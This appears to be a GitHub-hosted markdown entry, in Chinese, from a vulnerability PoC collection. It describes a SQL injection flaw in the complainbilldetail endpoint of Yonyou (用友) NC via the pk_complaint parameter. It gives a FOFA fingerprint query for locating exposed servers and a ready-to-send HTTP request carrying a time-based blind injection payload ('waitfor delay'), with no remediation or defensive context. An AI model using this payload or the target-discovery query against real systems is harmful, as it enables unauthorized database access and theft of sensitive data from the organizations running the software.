Skip to content

Latest commit

 

History

History
27 lines (16 loc) · 609 Bytes

用友NC-complainbilldetail存在SQL注入漏洞.md

File metadata and controls

27 lines (16 loc) · 609 Bytes

用友NC-complainbilldetail存在SQL注入漏洞

NC系统可利用/ebvp/advorappcoll/complainbilldetail接口中的pk_complaint参数进行sql注入,从而窃取服务器的敏感信息。

fofa

app="用友-UFIDA-NC"

poc

GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive